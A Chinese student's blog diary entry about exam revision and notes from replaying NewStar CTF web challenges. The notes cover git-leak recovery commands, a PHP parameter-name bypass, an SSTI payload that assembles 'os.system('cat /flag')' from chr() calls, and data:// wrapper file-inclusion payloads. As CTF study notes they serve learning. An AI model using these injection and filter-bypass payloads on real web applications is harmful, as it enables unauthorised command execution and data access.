2024.11.21
我就说为什么我在主页看不到自己的文章,原来默认只有随笔才在主页显示啊,所以今天写的是随笔啦
我的博客已经有三天啦,但是还没有正式的发过一篇文章哈哈哈哈哈哈哈,等过两天工作室分享会的时候发吧嘻嘻
今天做了什么呢
- 两篇阅读理解,两篇都错了两个,坚持吧,这次四级一定一定一定一定要过啊啊啊啊啊,保佑我
- 把昨天的概率论订正完啦,又写了一半,不会的确实海油很多啊啊啊啊,加油!!!! 一定一定一定一定要取得好的成绩
- 今天晚上呢,复现了newStar
- git泄露
git log 查看提交历史
git stash list 查看Stash
git stach pop 将之前存储的内容重新恢复到工作区 - 传参
如果直接传参 NewStar_CTF.2024=Welcome%0A 会发现并没有用。这是由 NewStar_CTF.2024 中的特殊字符 . 引起的,PHP 默认会将其解析为 NewStar_CTF_2024. 在 PHP 7 中,可以使用 [ 字符的非正确替换漏洞。当传入的参数名中出现 [ 且之后没有 ] 时,PHP 会将 [ 替换为 _,但此之后就不会继续替换后面的特殊字符了因此,GET 传参 NewStar[CTF.2024=Welcome%0a 即可 - SSTI过滤了所有字母
可以使用全角英文和chr()字符拼接(或八进制)绕过
_import_(chr(111)+chr(115)).system(chr(99)+chr(97)+chr(116)+chr(32)+chr(47)+chr(102)+chr(108)+chr(97)+chr(103)) - php伪协议中的data://
1、data://text/plain
url?file=data://text/plain,
2、data://text/plain;base64
url?file=data://text/plain;base64,PD9waHAgcGhwaW5mbygpOz8%2b

浙公网安备 33010602011771号